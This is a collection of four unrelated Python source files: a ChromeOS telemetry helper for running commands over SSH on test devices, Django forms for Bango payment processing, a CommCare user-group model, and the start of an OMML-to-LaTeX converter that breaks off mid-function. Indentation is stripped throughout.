_CHROME_PATHS = ['/opt/google/chrome/chrome ',
'/usr/local/opt/google/chrome/chrome ']
def RunCmd(args, cwd=None, quiet=False):
"""Opens a subprocess to execute a program and returns its return value.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
Returns:
Return code from the command execution.
"""
if not quiet:
logging.debug(' '.join(args) + ' ' + (cwd or ''))
with open(os.devnull, 'w') as devnull:
p = subprocess.Popen(args=args, cwd=cwd, stdout=devnull,
stderr=devnull, stdin=devnull, shell=False)
return p.wait()
def GetAllCmdOutput(args, cwd=None, quiet=False):
"""Open a subprocess to execute a program and returns its output.
Args:
args: A string or a sequence of program arguments. The program to execute is
the string or the first item in the args sequence.
cwd: If not None, the subprocess's current directory will be changed to
|cwd| before it's executed.
Returns:
Captures and returns the command's stdout.
Prints the command's stderr to logger (which defaults to stdout).
"""
if not quiet:
logging.debug(' '.join(args) + ' ' + (cwd or ''))
with open(os.devnull, 'w') as devnull:
p = subprocess.Popen(args=args, cwd=cwd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=devnull)
stdout, stderr = p.communicate()
if not quiet:
logging.debug(' > stdout=[%s], stderr=[%s]', stdout, stderr)
return stdout, stderr
def HasSSH():
try:
RunCmd(['ssh'], quiet=True)
RunCmd(['scp'], quiet=True)
logging.debug("HasSSH()->True")
return True
except OSError:
logging.debug("HasSSH()->False")
return False
class LoginException(Exception):
pass
class KeylessLoginRequiredException(LoginException):
pass
class CrOSInterface(object):
# pylint: disable=R0923
def __init__(self, hostname=None, ssh_identity=None):
self._hostname = hostname
# List of ports generated from GetRemotePort() that may not be in use yet.
self._reserved_ports = []
if self.local:
return
self._ssh_identity = None
self._ssh_args = ['-o ConnectTimeout=5',
'-o StrictHostKeyChecking=no',
'-o KbdInteractiveAuthentication=no',
'-o PreferredAuthentications=publickey',
'-o UserKnownHostsFile=/dev/null',
'-o ControlMaster=no']
if ssh_identity:
self._ssh_identity = os.path.abspath(os.path.expanduser(ssh_identity))
os.chmod(self._ssh_identity, stat.S_IREAD)
# Establish master SSH connection using ControlPersist.
# Since only one test will be run on a remote host at a time,
# the control socket filename can be telemetry@hostname.
self._ssh_control_file = '/tmp/' + 'telemetry' + '@' + hostname
with open(os.devnull, 'w') as devnull:
subprocess.call(self.FormSSHCommandLine(['-M', '-o ControlPersist=yes']),
stdin=devnull, stdout=devnull, stderr=devnull)
def __enter__(self):
return self
def __exit__(self, *args):
self.CloseConnection()
@property
def local(self):
return not self._hostname
@property
def hostname(self):
return self._hostname
def FormSSHCommandLine(self, args, extra_ssh_args=None):
if self.local:
# We run the command through the shell locally for consistency with
# how commands are run through SSH (crbug.com/239161). This work
# around will be unnecessary once we implement a persistent SSH
# connection to run remote commands (crbug.com/239607).
return ['sh', '-c', " ".join(args)]
full_args = ['ssh',
'-o ForwardX11=no',
'-o ForwardX11Trusted=no',
'-n', '-S', self._ssh_control_file] + self._ssh_args
if self._ssh_identity is not None:
full_args.extend(['-i', self._ssh_identity])
if extra_ssh_args:
full_args.extend(extra_ssh_args)
full_args.append('root@%s' % self._hostname)
full_args.extend(args)
return full_args
def _RemoveSSHWarnings(self, toClean):
"""Removes specific ssh warning lines from a string.
Args:
toClean: A string that may be containing multiple lines.
Returns:
A copy of toClean with all the Warning lines removed.
"""
# Remove the Warning about connecting to a new host for the first time.
return re.sub(
r'Warning: Permanently added [^\n]* to the list of known hosts.\s\n',
'', toClean)
def RunCmdOnDevice(self, args, cwd=None, quiet=False):
stdout, stderr = GetAllCmdOutput(
self.FormSSHCommandLine(args), cwd, quiet=quiet)
# The initial login will add the host to the hosts file but will also print
# a warning to stderr that we need to remove.
stderr = self._RemoveSSHWarnings(stderr)
return stdout, stderr
def TryLogin(self):
logging.debug('TryLogin()')
assert not self.local
stdout, stderr = self.RunCmdOnDevice(['echo', '$USER'], quiet=True)
if stderr != '':
if 'Host key verification failed' in stderr:
raise LoginException(('%s host key verification failed. ' +
'SSH to it manually to fix connectivity.') %
self._hostname)
if 'Operation timed out' in stderr:
raise LoginException('Timed out while logging into %s' % self._hostname)
if 'UNPROTECTED PRIVATE KEY FILE!' in stderr:
raise LoginException('Permissions for %s are too open. To fix this,\n'
'chmod 600 %s' % (self._ssh_identity,
self._ssh_identity))
if 'Permission denied (publickey,keyboard-interactive)' in stderr:
raise KeylessLoginRequiredException(
'Need to set up ssh auth for %s' % self._hostname)
raise LoginException('While logging into %s, got %s' % (
self._hostname, stderr))
if stdout != 'root\n':
raise LoginException(
'Logged into %s, expected $USER=root, but got %s.' % (
self._hostname, stdout))
def FileExistsOnDevice(self, file_name):
if self.local:
return os.path.exists(file_name)
stdout, stderr = self.RunCmdOnDevice([
'if', 'test', '-e', file_name, ';',
'then', 'echo', '1', ';',
'fi'
], quiet=True)
if stderr != '':
if "Connection timed out" in stderr:
raise OSError('Machine wasn\'t responding to ssh: %s' %
stderr)
raise OSError('Unexpected error: %s' % stderr)
exists = stdout == '1\n'
logging.debug("FileExistsOnDevice(<text>, %s)->%s" % (file_name, exists))
return exists
def PushFile(self, filename, remote_filename):
if self.local:
args = ['cp', '-r', filename, remote_filename]
stdout, stderr = GetAllCmdOutput(args, quiet=True)
if stderr != '':
raise OSError('No such file or directory %s' % stderr)
return
args = ['scp', '-r'] + self._ssh_args
if self._ssh_identity:
args.extend(['-i', self._ssh_identity])
args.extend([os.path.abspath(filename),
'root@%s:%s' % (self._hostname, remote_filename)])
stdout, stderr = GetAllCmdOutput(args, quiet=True)
stderr = self._RemoveSSHWarnings(stderr)
if stderr != '':
raise OSError('No such file or directory %s' % stderr)
def PushContents(self, text, remote_filename):
logging.debug("PushContents(<text>, %s)" % remote_filename)
with tempfile.NamedTemporaryFile() as f:
f.write(text)
f.flush()
self.PushFile(f.name, remote_filename)
def GetFile(self, filename, destfile=None):
"""Copies a local file |filename| to |destfile| on the device.
Args:
filename: The name of the local source file.
destfile: The name of the file to copy to, and if it is not specified
then it is the basename of the source file.
"""
logging.debug("GetFile(%s, %s)" % (filename, destfile))
if self.local:
if destfile is not None and destfile != filename:
shutil.copyfile(filename, destfile)
return
if destfile is None:
destfile = os.path.basename(filename)
args = ['scp'] + self._ssh_args
if self._ssh_identity:
args.extend(['-i', self._ssh_identity])
args.extend(['root@%s:%s' % (self._hostname, filename),
os.path.abspath(destfile)])
stdout, stderr = GetAllCmdOutput(args, quiet=True)
stderr = self._RemoveSSHWarnings(stderr)
if stderr != '':
raise OSError('No such file or directory %s' % stderr)
def GetFileContents(self, filename):
"""Get the contents of a file on the device.
Args:
filename: The name of the file on the device.
Returns:
A string containing the contents of the file.
"""
# TODO: handle the self.local case
assert not self.local
t = tempfile.NamedTemporaryFile()
self.GetFile(filename, t.name)
with open(t.name, 'r') as f2:
res = f2.read()
logging.debug("GetFileContents(%s)->%s" % (filename, res))
f2.close()
return res
def ListProcesses(self):
"""Returns (pid, cmd, ppid, state) of all processes on the device."""
stdout, stderr = self.RunCmdOnDevice([
'/bin/ps', '--no-headers',
'-A',
'-o', 'pid,ppid,args:4096,state'], quiet=True)
assert stderr == '', stderr
procs = []
for l in stdout.split('\n'): # pylint: disable=E1103
if l == '':
continue
m = re.match(r'^\s*(\d+)\s+(\d+)\s+(.+)\s+(.+)', l, re.DOTALL)
assert m
procs.append((int(m.group(1)), m.group(3).rstrip(),
int(m.group(2)), m.group(4)))
logging.debug("ListProcesses(<predicate>)->[%i processes]" % len(procs))
return procs
def _GetSessionManagerPid(self, procs):
"""Returns the pid of the session_manager process, given the list of
processes."""
for pid, process, _, _ in procs:
argv = process.split()
if argv and os.path.basename(argv[0]) == 'session_manager':
return pid
return None
def GetChromeProcess(self):
"""Locates the the main chrome browser process.
Chrome on cros is usually in /opt/google/chrome, but could be in
/usr/local/ for developer workflows - debug chrome is too large to fit on
rootfs.
Chrome spawns multiple processes for renderers. pids wrap around after they
are exhausted so looking for the smallest pid is not always correct. We
locate the session_manager's pid, and look for the chrome process that's an
immediate child. This is the main browser process.
"""
procs = self.ListProcesses()
session_manager_pid = self._GetSessionManagerPid(procs)
if not session_manager_pid:
return None
# Find the chrome process that is the child of the session_manager.
for pid, process, ppid, _ in procs:
if ppid != session_manager_pid:
continue
for path in _CHROME_PATHS:
if process.startswith(path):
return {'pid': pid, 'path': path, 'args': process}
return None
def GetChromePid(self):
"""Returns pid of main chrome browser process."""
result = self.GetChromeProcess()
if result and 'pid' in result:
return result['pid']
return None
def RmRF(self, filename):
logging.debug("rm -rf %s" % filename)
self.RunCmdOnDevice(['rm', '-rf', filename], quiet=True)
def Chown(self, filename):
self.RunCmdOnDevice(['chown', '-R', 'chronos:chronos', filename])
def KillAllMatching(self, predicate):
kills = ['kill', '-KILL']
for pid, cmd, _, _ in self.ListProcesses():
if predicate(cmd):
logging.info('Killing %s, pid %d' % cmd, pid)
kills.append(pid)
logging.debug("KillAllMatching(<predicate>)->%i" % (len(kills) - 2))
if len(kills) > 2:
self.RunCmdOnDevice(kills, quiet=True)
return len(kills) - 2
def IsServiceRunning(self, service_name):
stdout, stderr = self.RunCmdOnDevice([
'status', service_name], quiet=True)
assert stderr == '', stderr
running = 'running, process' in stdout
logging.debug("IsServiceRunning(%s)->%s" % (service_name, running))
return running
def GetRemotePort(self):
netstat = self.RunCmdOnDevice(['netstat', '-ant'])
netstat = netstat[0].split('\n')
ports_in_use = []
for line in netstat[2:]:
if not line:
continue
address_in_use = line.split()[3]
port_in_use = address_in_use.split(':')[-1]
ports_in_use.append(int(port_in_use))
ports_in_use.extend(self._reserved_ports)
new_port = sorted(ports_in_use)[-1] + 1
self._reserved_ports.append(new_port)
return new_port
def IsHTTPServerRunningOnPort(self, port):
wget_output = self.RunCmdOnDevice(
['wget', 'localhost:%i' % (port), '-T1', '-t1'])
if 'Connection refused' in wget_output[1]:
return False
return True
def FilesystemMountedAt(self, path):
"""Returns the filesystem mounted at |path|"""
df_out, _ = self.RunCmdOnDevice(['/bin/df', path])
df_ary = df_out.split('\n')
# 3 lines for title, mount info, and empty line.
if len(df_ary) == 3:
line_ary = df_ary[1].split()
if line_ary:
return line_ary[0]
return None
def CryptohomePath(self, user):
"""Returns the cryptohome mount point for |user|."""
stdout, stderr = self.RunCmdOnDevice(
['cryptohome-path', 'user', "'%s'" % user])
if stderr != '':
raise OSError('cryptohome-path failed: %s' % stderr)
return stdout.rstrip()
def IsCryptohomeMounted(self, username, is_guest):
"""Returns True iff |user|'s cryptohome is mounted."""
profile_path = self.CryptohomePath(username)
mount = self.FilesystemMountedAt(profile_path)
mount_prefix = 'guestfs' if is_guest else '/home/.shadow/'
return mount and mount.startswith(mount_prefix)
def TakeScreenShot(self, screenshot_prefix):
"""Takes a screenshot, useful for debugging failures."""
# TODO(achuith): Find a better location for screenshots. Cros autotests
# upload everything in /var/log so use /var/log/screenshots for now.
SCREENSHOT_DIR = '/var/log/screenshots/'
SCREENSHOT_EXT = '.png'
self.RunCmdOnDevice(['mkdir', '-p', SCREENSHOT_DIR])
for i in xrange(25):
screenshot_file = ('%s%s-%d%s' %
(SCREENSHOT_DIR, screenshot_prefix, i, SCREENSHOT_EXT))
if not self.FileExistsOnDevice(screenshot_file):
self.RunCmdOnDevice([
'/usr/local/autotest/bin/screenshot.py',
screenshot_file])
return
logging.warning('screenshot directory full.')
def RestartUI(self, clear_enterprise_policy):
logging.info('(Re)starting the ui (logs the user out)')
if clear_enterprise_policy:
self.RunCmdOnDevice(['stop', 'ui'])
self.RmRF('/var/lib/whitelist/*')
self.RmRF(r'/home/chronos/Local\ State')
if self.IsServiceRunning('ui'):
self.RunCmdOnDevice(['restart', 'ui'])
else:
self.RunCmdOnDevice(['start', 'ui'])
def CloseConnection(self):
if not self.local:
with open(os.devnull, 'w') as devnull:
subprocess.call(self.FormSSHCommandLine(['-O', 'exit', self._hostname]),
stdout=devnull, stderr=devnull)
| |
from datetime import datetime, timedelta
from django import forms
from django.conf import settings
from django.shortcuts import get_object_or_404
from lxml import etree
from lib.bango.constants import (COUNTRIES, CURRENCIES, INVALID_PERSON, OK,
RATINGS, RATINGS_SCHEME,
VAT_NUMBER_DOES_NOT_EXIST)
from lib.bango.utils import verify_sig
from lib.sellers.models import SellerProductBango
from lib.transactions.constants import (SOURCE_BANGO, STATUS_COMPLETED,
TYPE_PAYMENT, TYPE_REFUND)
from lib.transactions.forms import check_status
from lib.transactions.models import Transaction
from solitude.fields import ListField, URLField
from solitude.logger import getLogger
log = getLogger('s.bango')
class ProductForm(forms.ModelForm):
seller_bango = URLField(to='lib.bango.resources.package.PackageResource')
seller_product = URLField(to='lib.sellers.resources.SellerProductResource')
name = forms.CharField()
packageId = forms.IntegerField()
class Meta:
model = SellerProductBango
fields = ('seller_bango', 'seller_product', 'name', 'packageId')
class PackageForm(forms.Form):
adminEmailAddress = forms.CharField()
supportEmailAddress = forms.CharField()
financeEmailAddress = forms.CharField()
paypalEmailAddress = forms.CharField()
vendorName = forms.CharField()
companyName = forms.CharField()
address1 = forms.CharField()
address2 = forms.CharField(required=False)
addressCity = forms.CharField()
addressState = forms.CharField()
addressZipCode = forms.CharField()
addressPhone = forms.CharField()
addressFax = forms.CharField(required=False)
vatNumber = forms.CharField(required=False)
countryIso = forms.CharField()
currencyIso = forms.CharField()
homePageURL = forms.CharField(required=False)
eventNotificationURL = forms.CharField(required=False)
seller = URLField(to='lib.sellers.resources.SellerResource')
@property
def bango_data(self):
result = self.cleaned_data.copy()
del result['seller']
return result
class SupportEmailForm(forms.Form):
supportEmailAddress = forms.CharField()
@property
def bango_meta(self):
return {'raise_on': (INVALID_PERSON,),
'to_field': 'support_person_id',
'from_field': 'personId',
'method': 'UpdateSupportEmailAddress'}
@property
def bango_data(self):
return {'emailAddress': self.cleaned_data.get('supportEmailAddress')}
class FinanceEmailForm(forms.Form):
financeEmailAddress = forms.CharField()
@property
def bango_data(self):
return {'emailAddress': self.cleaned_data.get('financeEmailAddress')}
@property
def bango_meta(self):
return {'raise_on': (INVALID_PERSON,),
'to_field': 'finance_person_id',
'from_field': 'personId',
'method': 'UpdateFinanceEmailAddress'}
class VatNumberForm(forms.Form):
vatNumber = forms.CharField(required=False)
_is_delete = False
def clean_vatNumber(self):
data = self.cleaned_data.get('vatNumber', '')
if not data:
self._is_delete = True
return data
@property
def bango_data(self):
return {} if self._is_delete else self.cleaned_data.copy()
@property
def bango_meta(self):
if self._is_delete:
return {'raise_on': (VAT_NUMBER_DOES_NOT_EXIST,),
'method': 'DeleteVATNumber'}
return {'method': 'SetVATNumber'}
class UpdateAddressForm(forms.Form):
vendorName = forms.CharField()
address1 = forms.CharField()
address2 = forms.CharField(required=False)
addressCity = forms.CharField()
addressState = forms.CharField()
addressZipCode = forms.CharField()
addressPhone = forms.CharField()
addressFax = forms.CharField(required=False)
# Note the docs are wrong, its not AddressCountryIso.
countryIso = forms.CharField()
homePageURL = forms.CharField(required=False)
@property
def bango_data(self):
return self.cleaned_data.copy()
@property
def bango_meta(self):
return {'method': 'UpdateAddressDetails'}
class CreateBangoNumberForm(forms.Form):
seller_bango = URLField(to='lib.bango.resources.package.PackageResource')
seller_product = URLField(to='lib.sellers.resources.SellerProductResource')
name = forms.CharField(max_length=100)
# TODO: Expand this bug 814492.
categoryId = forms.IntegerField()
@property
def bango_data(self):
result = self.cleaned_data.copy()
result['applicationSize'] = 1
result['packageId'] = result['seller_bango'].package_id
del result['seller_bango']
del result['seller_product']
return result
class SellerProductForm(forms.Form):
# Base class for a form that interacts using the
# seller_product_bango resource.
seller_product_bango = URLField(
to='lib.bango.resources.package.BangoProductResource')
@property
def bango_data(self):
result = self.cleaned_data.copy()
result['bango'] = result['seller_product_bango'].bango_id
del result['seller_product_bango']
return result
def clean_seller_product_bango(self):
res = self.cleaned_data['seller_product_bango']
if not res.bango_id:
raise forms.ValidationError('Empty bango_id for: %s' % res.pk)
return res
class MakePremiumForm(SellerProductForm):
currencyIso = forms.ChoiceField(choices=([r, r] for r
in CURRENCIES.keys()))
price = forms.DecimalField()
class UpdateRatingForm(SellerProductForm):
ratingScheme = forms.ChoiceField(choices=([r, r] for r in RATINGS_SCHEME))
rating = forms.ChoiceField(choices=([r, r] for r in RATINGS))
class CreateBillingConfigurationForm(SellerProductForm):
pageTitle = forms.CharField()
prices = ListField()
redirect_url_onerror = forms.URLField()
redirect_url_onsuccess = forms.URLField()
transaction_uuid = forms.CharField()
icon_url = forms.URLField(required=False)
@property
def bango_data(self):
data = super(CreateBillingConfigurationForm, self).bango_data
data['externalTransactionId'] = data.pop('transaction_uuid')
del data['prices']
return data
def clean_prices(self):
# Remarkably like a formset, but without the drama.
prices = self.cleaned_data.get('prices', [])
results = []
for price in prices:
result = PriceForm(price)
try:
if not result.is_valid():
raise forms.ValidationError(result.errors)
except AttributeError:
raise forms.ValidationError('Invalid JSON.')
results.append(result)
if not results:
raise forms.ValidationError(self.fields['prices']
.error_messages['required'])
return results
class PriceForm(forms.Form):
amount = forms.DecimalField()
currency = forms.ChoiceField(choices=([r, r] for r in CURRENCIES.keys()))
class CreateBankDetailsForm(forms.Form):
seller_bango = URLField(to='lib.bango.resources.package.PackageResource')
bankAccountPayeeName = forms.CharField(max_length=50)
bankAccountNumber = forms.CharField(max_length=20, required=False)
bankAccountCode = forms.CharField(max_length=20)
bankAccountIban = forms.CharField(max_length=34, required=False)
bankName = forms.CharField(max_length=50)
bankAddress1 = forms.CharField(max_length=50)
bankAddress2 = forms.CharField(max_length=50, required=False)
bankAddressCity = forms.CharField(max_length=50, required=False)
bankAddressState = forms.CharField(max_length=50, required=False)
bankAddressZipCode = forms.CharField(max_length=50)
bankAddressIso = forms.ChoiceField(choices=([r, r] for r in COUNTRIES))
def clean(self):
if not (self.cleaned_data.get('bankAccountNumber')
or self.cleaned_data.get('bankAccountIban')):
raise forms.ValidationError('Need either bankAccountNumber '
'or bankIban')
return self.cleaned_data
@property
def bango_data(self):
result = self.cleaned_data.copy()
result['packageId'] = result['seller_bango'].package_id
del result['seller_bango']
return result
class NotificationForm(forms.Form):
# This is our own signature of the moz_transaction that we sent to
# the Billing Config API
moz_signature = forms.CharField()
# When passed into the form, this must be a valid transaction_uuid.
moz_transaction = forms.CharField()
# This is the Bango billing config ID we created with the API.
billing_config_id = forms.CharField()
# These parameters arrive in the query string.
bango_response_code = forms.CharField()
bango_response_message = forms.CharField()
bango_trans_id = forms.CharField()
# Store the actual price paid.
amount = forms.DecimalField(required=False)
currency = forms.CharField(required=False)
def clean(self):
cleaned_data = super(NotificationForm, self).clean()
trans = cleaned_data.get('moz_transaction')
sig = cleaned_data.get('moz_signature')
if trans and sig:
# Both fields were non-empty so check the signature.
if not verify_sig(sig, trans.uuid):
log.info('Signature failed: %s'
% cleaned_data.get('billing_config_id'))
raise forms.ValidationError(
'Signature did not match: %s for %s'
% (sig, trans.uuid))
return cleaned_data
def clean_moz_transaction(self):
uuid = self.cleaned_data['moz_transaction']
billing_id = self.cleaned_data.get('billing_config_id')
try:
trans = Transaction.objects.get(uuid=uuid)
except Transaction.DoesNotExist:
log.info('Transaction not found: %s' % billing_id)
raise forms.ValidationError('Transaction not found: %s' % uuid)
if trans.status == STATUS_COMPLETED:
raise forms.ValidationError('Transaction completed: %s' % uuid)
if trans.created < (datetime.now() -
timedelta(seconds=settings.TRANSACTION_EXPIRY)):
log.info('Transaction: %s' % billing_id)
raise forms.ValidationError('Transaction expired: %s' % uuid)
return trans
class EventForm(forms.Form):
notification = forms.CharField(required=True)
def clean_notification(self):
try:
data = etree.fromstring(self.cleaned_data['notification'])
except etree.XMLSyntaxError:
log.error('XML parse error')
raise forms.ValidationError('XML parse error')
action = data.find('action')
if action is None: # bool(action) is False, so check against None.
raise forms.ValidationError('Action is required')
if action.text != 'PAYMENT':
raise forms.ValidationError('Action invalid: {0}'
.format(action.text))
if data.find('data') is None:
raise forms.ValidationError('Data is required')
# Easier to work with a dictionary than etree.
data = dict([c.values() for c in data.find('data').getchildren()])
if data.get('status') != OK:
# Cannot find any other definitions of what state might be.
raise forms.ValidationError('Unspecified state: {0}'
.format(data.get('status')))
try:
trans = Transaction.objects.get(uid_pay=data['transId'])
except Transaction.DoesNotExist:
raise forms.ValidationError('Transaction not found: {0}'
.format(data['transId']))
data['new_status'] = {OK: STATUS_COMPLETED}[data['status']]
old = {'status': trans.status, 'created': trans.created}
new = {'status': data['new_status']}
try:
check_status(old, new)
except forms.ValidationError:
log.warning('Invalid status change to: {0} for transaction: {1}'
.format(data['new_status'], trans.pk))
raise
# Instead of having to get the Transaction again save it.
self.cleaned_data['transaction'] = trans
return data
class SBIForm(forms.Form):
seller_bango = URLField(to='lib.bango.resources.package.PackageResource')
@property
def bango_data(self):
result = self.cleaned_data.copy()
result['packageId'] = result['seller_bango'].package_id
del result['seller_bango']
return result
class RefundForm(forms.Form):
uuid = forms.CharField()
def clean_uuid(self):
transaction = get_object_or_404(Transaction,
uuid=self.cleaned_data['uuid'])
if transaction.provider != SOURCE_BANGO:
raise forms.ValidationError('Not a Bango transaction')
elif transaction.status != STATUS_COMPLETED:
raise forms.ValidationError('Not completed')
elif transaction.type != TYPE_PAYMENT:
raise forms.ValidationError('Not a payment')
elif transaction.is_refunded():
raise forms.ValidationError('Already refunded')
return transaction
class RefundStatusForm(forms.Form):
uuid = forms.CharField()
def clean_uuid(self):
# Rather than just returning a 404, let's help the caller of this API
# tell them why their transaction is denied.
transaction = Transaction.objects.get(uuid=self.cleaned_data['uuid'])
if transaction.type != TYPE_REFUND:
raise forms.ValidationError('Not a refund')
return transaction
| |
from __future__ import absolute_import
from couchdbkit.ext.django.schema import *
from dimagi.utils.decorators.memoized import memoized
from corehq.apps.users.models import CouchUser, CommCareUser
from dimagi.utils.couch.undo import UndoableDocument, DeleteDocRecord
from django.conf import settings
class Group(UndoableDocument):
"""
The main use case for these 'groups' of users is currently
so that we can break down reports by arbitrary regions.
(Things like who sees what reports are determined by permissions.)
"""
domain = StringProperty()
name = StringProperty()
# a list of user ids for users
users = ListProperty()
path = ListProperty()
case_sharing = BooleanProperty()
reporting = BooleanProperty(default=True)
# custom data can live here
metadata = DictProperty()
def add_user(self, couch_user_id, save=True):
if not isinstance(couch_user_id, basestring):
couch_user_id = couch_user_id.user_id
if couch_user_id not in self.users:
self.users.append(couch_user_id)
if save:
self.save()
def remove_user(self, couch_user_id, save=True):
if not isinstance(couch_user_id, basestring):
couch_user_id = couch_user_id.user_id
if couch_user_id in self.users:
for i in range(0,len(self.users)):
if self.users[i] == couch_user_id:
del self.users[i]
if save:
self.save()
return
def add_group(self, group):
group.add_to_group(self)
def add_to_group(self, group):
"""
food = Food(path=[food_id])
fruit = Fruit(path=[fruit_id])
If fruit.add_to_group(food._id):
then update fruit.path to be [food_id, fruit_id]
"""
group_id = group._id
if group_id in self.path:
raise Exception("Group %s is already a member of %s" % (
self.get_id,
group_id,
))
new_path = [group_id]
new_path.extend(self.path)
self.path = new_path
self.save()
def remove_group(self, group):
group.remove_from_group(self)
def remove_from_group(self, group):
"""
food = Food(path=[food_id])
fruit = Fruit(path=[food_id, fruit_id])
If fruit.remove_from_group(food._id):
then update fruit.path to be [fruit_id]
"""
group_id = group._id
if group_id not in self.path:
raise Exception("Group %s is not a member of %s" % (
self.get_id,
group_id
))
index = 0
for i in range(0,len(self.path)):
if self.path[i] == group_id:
index = i
break
self.path = self.path[index:]
self.save()
def get_user_ids(self, is_active=True):
return [user.user_id for user in self.get_users(is_active)]
def get_users(self, is_active=True, only_commcare=False):
users = [CouchUser.get_by_user_id(user_id) for user_id in self.users]
users = [user for user in users if not user.is_deleted()]
if only_commcare is True:
users = [
user for user in users
if user.__class__ == CommCareUser().__class__
]
if is_active is True:
return [user for user in users if user.is_active]
else:
return users
@memoized
def get_static_user_ids(self, is_active=True):
return [user.user_id for user in self.get_static_users(is_active)]
@memoized
def get_static_users(self, is_active=True):
return self.get_users(is_active)
@classmethod
def by_domain(cls, domain):
return cls.view('groups/by_domain',
key=domain,
include_docs=True,
#stale=settings.COUCH_STALE_QUERY,
).all()
@classmethod
def ids_by_domain(cls, domain):
return [r['id'] for r in cls.get_db().view('groups/by_domain',
key=domain,
include_docs=False,
)]
@classmethod
def by_name(cls, domain, name, one=True):
result = cls.view('groups/by_name',
key=[domain, name],
include_docs=True,
#stale=settings.COUCH_STALE_QUERY,
)
if one:
return result.one()
else:
return result
@classmethod
def by_user(cls, user_or_user_id, wrap=True, include_names=False):
try:
user_id = user_or_user_id.user_id
except AttributeError:
user_id = user_or_user_id
results = cls.view('groups/by_user', key=user_id, include_docs=wrap)
if wrap:
return results
if include_names:
return [dict(group_id=r['id'], name=r['value'][1]) for r in results]
else:
return [r['id'] for r in results]
@classmethod
def get_case_sharing_groups(cls, domain, wrap=True):
all_groups = cls.by_domain(domain)
if wrap:
return [group for group in all_groups if group.case_sharing]
else:
return [group._id for group in all_groups if group.case_sharing]
@classmethod
def get_reporting_groups(cls, domain):
key = ['^Reporting', domain]
return cls.view('groups/by_name',
startkey=key,
endkey=key + [{}],
include_docs=True,
#stale=settings.COUCH_STALE_QUERY,
).all()
def create_delete_record(self, *args, **kwargs):
return DeleteGroupRecord(*args, **kwargs)
@property
def display_name(self):
if self.name:
return self.name
else:
return "[No Name]"
@classmethod
def user_in_group(cls, user_id, group_id):
if not user_id or not group_id:
return False
c = cls.get_db().view('groups/by_user',
key=user_id,
startkey_docid=group_id,
endkey_docid=group_id
).count()
if c == 0:
return False
elif c == 1:
return True
else:
raise Exception(
"This should just logically not be possible unless the group "
"has the user in there twice"
)
def is_member_of(self, domain):
return self.domain == domain
def __repr__(self):
return ("Group(domain={self.domain!r}, name={self.name!r}, "
+ "case_sharing={self.case_sharing!r}, users={users!r})"
).format(self=self, users=self.get_users())
class DeleteGroupRecord(DeleteDocRecord):
def get_doc(self):
return Group.get(self.doc_id)
| |
# -*- coding: utf-8 -*-
"""
Office Math Markup Language (OMML)
"""
from dwml import ET,NotSupport
from dwml.utils import PY2
from dwml.latex_dict import (CHARS,CHR,CHR_BO,CHR_DEFAULT,POS,POS_DEFAULT
,SUB,SUP,F,F_DEFAULT,T,FUNC,D,D_DEFAULT,RAD,RAD_DEFAULT,ARR
,LIM_FUNC,LIM_TO,LIM_UPP,M,BRK,BLANK,BACKSLASH,ALN,FUNC_PLACE)
OMML_NS = "{http://schemas.openxmlformats.org/officeDocument/2006/math}"
def load(stream):
tree = ET.parse(stream)
for omath in tree.findall(OMML_NS+'oMath'):
yield oMath2Latex(omath)
def load_string(string):
root = ET.fromstring(string)
for omath in root.findall(OMML_NS+'oMath'):
yield oMath2Latex(omath)
def escape_latex(strs):
last = None
new_chr = []
strs = strs.replace(r'\\','\\')
for c in strs :
if (c in CHARS) and (last !=BACKSLASH):
new_chr.append(BACKSLASH+c)
else:
new_chr.append(c)
last = c
return BLANK.join(new_chr)
def get_val(key,default=None,store=CHR):
if key is not None:
return key if not store else store.get(key,key)
else:
return default
class Tag2Method(object):
def call_method(self,elm,stag=None):
getmethod = self.tag2meth.get
if stag is None:
stag = elm.tag.replace(OMML_NS,'')
method = getmethod(stag)
if method:
return method(self,elm)
else:
return None
def process_children_list(self,elm,include=None):
"""
process children of the elm,return iterable
"""
for _e in list(elm):
if (OMML_NS not in _e.tag):
continue
stag = _e.tag.replace(OMML_NS,'')
if include and (stag not in include):
continue
t = self.call_method(_e,stag=stag)
if t is None:
t = self.process_unknow(_e,stag)
if t is None:
continue
yield (stag,t,_e)
def process_children_dict(self,elm,include=None):
"""
process children of the elm,return dict
"""
latex_chars = dict()
for stag,t,e in self.process_children_list(elm,include):
latex_chars[stag] = t
return latex_chars
def process_children(self,elm,include=None):
"""
process children of the elm,return string
"""
return BLANK.join(( t if not isinstance(t,Tag2Method) else str(t)
for stag,t,e in self.process_children_list(elm,include)))
def process_unknow(self,elm,stag):
return None
class Pr(Tag2Method):
text = ''
__val_tags = ('chr','pos','begChr','endChr','type')
__innerdict= None #can't use the __dict__
""" common properties of element"""
def __init__(self, elm):
self.__innerdict={}
self.text=self.process_children(elm)
def __str__(self):
return self.text
def __unicode__(self):
return self.__str__(self)
def __getattr__(self,name):
return self.__innerdict.get(name,None)
def do_brk(self,elm):
self.__innerdict['brk'] = BRK
return BRK
def do_common(self,elm):
stag = elm.tag.replace(OMML_NS,'')
if stag in self.__val_tags:
t = elm.get('{0}val'.format(OMML_NS))
if PY2 and (t != None):
t = t if isinstance(t,unicode) else unicode(t,'utf-8')
self.__innerdict[stag] = t
return None
tag2meth = {
'brk':do_brk,
'chr':do_common,
'pos':do_common,
'begChr':do_common,
'endChr':do_common,
'type':do_common,
}
class oMath2Latex(Tag2Method):
"""
Convert oMath element of omml to latex
"""
_t_dict = T
__direct_tags = ('box','sSub','sSup','sSubSup','num','den','deg','e')
def __init__(self,element):
self._latex = self.process_children(element)
def __str__(self):
return self.latex
def __unicode__(self):
return self.__str__(self)
def process_unknow(self,elm,stag):
if stag in self.__direct_tags:
return self.process_children(elm)
elif stag[-2:] == 'Pr':
return Pr(elm)
else:
return None
@property
def latex(self):
return self._latex if not PY2 else self._latex.encode('utf-8')
def do_acc(self,elm):
"""
the accent function
"""
c_dict = self.process_children_dict(elm)
latex_s = get_val(c_dict['accPr'].chr,default=CHR_DEFAULT.get('ACC_VAL'),store=CHR)
return latex_s.format(c_dict['e'])
def do_bar(self,elm):
"""
the bar function
"""
c_dict = self.process_children_dict(elm)
pr = c_dict['barPr']
latex_s = get_val(pr.pos,default=POS_DEFAULT.get('BAR_VAL'),store=POS)
return pr.text+latex_s.format(c_dict['e'])
def do_d(self,elm):
"""
the delimiter object
"""
c_dict = self.process_children_dict(elm)
pr = c_dict['dPr']
